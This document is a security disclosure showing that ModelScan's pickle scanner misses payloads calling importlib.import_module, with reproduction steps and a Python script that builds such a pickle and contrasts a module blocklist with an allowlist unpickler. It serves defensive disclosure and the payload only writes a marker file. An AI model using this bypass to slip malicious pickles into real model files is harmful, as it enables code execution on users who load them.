# ModelScan PickleUnsafeOpScan Bypass PoC

## Steps to Reproduce
```bash
# 1. Scan the crafted pickle with ModelScan: nothing is flagged
modelscan -p model.bin
# Output: Issues: 0, Errors: 0, Skipped: 0

# 2. Load the model (the companion malice.py must be importable, i.e. in the
#    working directory or elsewhere on sys.path)
python3 -c "import pickle; pickle.load(open('model.bin','rb'))"

# 3. Check for RCE: the marker file is written by malice.py at import time
cat /tmp/modelscan_bypass.txt
# Output: MODELSCAN_IMPORTLIB_BYPASS_SUCCESS
```
## Technical Details

ModelScan's PickleUnsafeOpScan matches the globals a pickle references (the callables resolved by its `GLOBAL` / `STACK_GLOBAL` opcodes) against a hardcoded blocklist of unsafe modules, `unsafe_globals`. The `importlib` module is NOT in that blocklist, so a pickle whose `REDUCE` callable is `importlib.import_module` is not flagged.

When the pickle is deserialized, `importlib.import_module('malice')` imports the companion `malice.py` file (from the current working directory or any other entry on `sys.path`), and the module body runs arbitrary Python code at import time; in this PoC it writes the marker to `/tmp/modelscan_bypass.txt`.

The gap is structural rather than a single missing entry: a blocklist of dangerous modules is bypassed by any importer or indirect caller it does not name, of which `importlib.import_module` is only the most obvious. A loader that overrides `Unpickler.find_class` and allows only the globals the model format actually needs (an allowlist) refuses this payload before the callable is ever resolved.
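As an added example (not code from this PoC, from ModelScan, or from `malice.py`): the script below builds the same `importlib.import_module('malice')` payload in memory, lists the globals it references with `pickletools`, and contrasts two policies over it. `MODULE_BLOCKLIST` is a constructed stand-in for a ModelScan-style blocklist (not ModelScan's actual list) that likewise omits `importlib`, so it reports nothing; `AllowlistUnpickler` is the opposite policy and refuses the global in `find_class` before it is resolved, so `malice` is never imported and no `malice.py` is needed to run the example. The allowlist entries are hypothetical placeholders for whatever a real model format requires.

```python
"""Importlib pickle payload: blocklist scan vs. allowlist unpickler (added example)."""
import importlib
import io
import pickle
import pickletools

# Constructed approximation of a ModelScan-style module blocklist (not the
# project's real list). "importlib" is absent, which is the whole bypass.
MODULE_BLOCKLIST = {
    "os", "posix", "nt", "subprocess", "sys", "socket", "shutil",
    "runpy", "pty", "builtins", "__builtin__", "pickle", "_pickle",
}


class ImportlibPayload:
    """Pickles to REDUCE(importlib.import_module, ('malice',)).
    'malice' is a hypothetical module name; this script never imports it."""

    def __reduce__(self):
        return (importlib.import_module, ("malice",))


def build_payload(protocol: int = pickle.HIGHEST_PROTOCOL) -> bytes:
    return pickle.dumps(ImportlibPayload(), protocol=protocol)


def benign_payload() -> bytes:
    """A pickle with no globals at all, e.g. a plain dict of weights."""
    return pickle.dumps({"weights": [0.1, 0.2]}, protocol=4)


def referenced_globals(data: bytes) -> list:
    """Every (module, name) pair the pickle resolves, via GLOBAL (protocol <= 3)
    or STACK_GLOBAL (protocol >= 4). Simplified: STACK_GLOBAL operands are taken
    from the two most recent string constants, which is what pickle.dumps emits."""
    found = []
    strings = []
    for op, arg, _pos in pickletools.genops(data):
        if op.name == "GLOBAL":
            module, name = arg.split(" ", 1)  # pickletools joins the two lines with a space
            found.append((module, name))
        elif op.name == "STACK_GLOBAL":
            name = strings.pop()
            module = strings.pop()
            found.append((module, name))
        elif op.name in ("SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE"):
            strings.append(arg)
    return found


def blocklist_findings(data: bytes, blocklist=MODULE_BLOCKLIST) -> list:
    """What a blocklist scanner reports: only globals whose module is listed."""
    return [(m, n) for m, n in referenced_globals(data) if m in blocklist]


class AllowlistUnpickler(pickle.Unpickler):
    """Refuse every global not explicitly permitted. The entries are hypothetical
    placeholders for the globals a real model format needs."""

    ALLOWED = {("collections", "OrderedDict"), ("builtins", "dict")}

    def find_class(self, module, name):
        if (module, name) not in self.ALLOWED:
            raise pickle.UnpicklingError(f"refusing global {module}.{name}")
        return super().find_class(module, name)


def allowlist_load(data: bytes):
    """Return (True, obj) on success or (False, reason) when a global is refused."""
    try:
        return True, AllowlistUnpickler(io.BytesIO(data)).load()
    except pickle.UnpicklingError as exc:
        return False, str(exc)


if __name__ == "__main__":
    for proto in (2, 4):  # protocol 2 emits GLOBAL, protocol 4 emits STACK_GLOBAL
        payload = build_payload(proto)
        print(f"protocol {proto}: globals={referenced_globals(payload)}")
        print(f"  blocklist findings: {blocklist_findings(payload)}")
        print(f"  allowlist load:     {allowlist_load(payload)}")
    print(f"benign pickle via allowlist: {allowlist_load(benign_payload())}")
```

Running it shows the same global, `('importlib', 'import_module')`, for both pickle protocols, an empty finding list from the blocklist, and a refusal from the allowlist loader, while the benign dict still loads. The blocklist could be patched to add `importlib`, but the allowlist is what makes the decision independent of which importer the attacker picks.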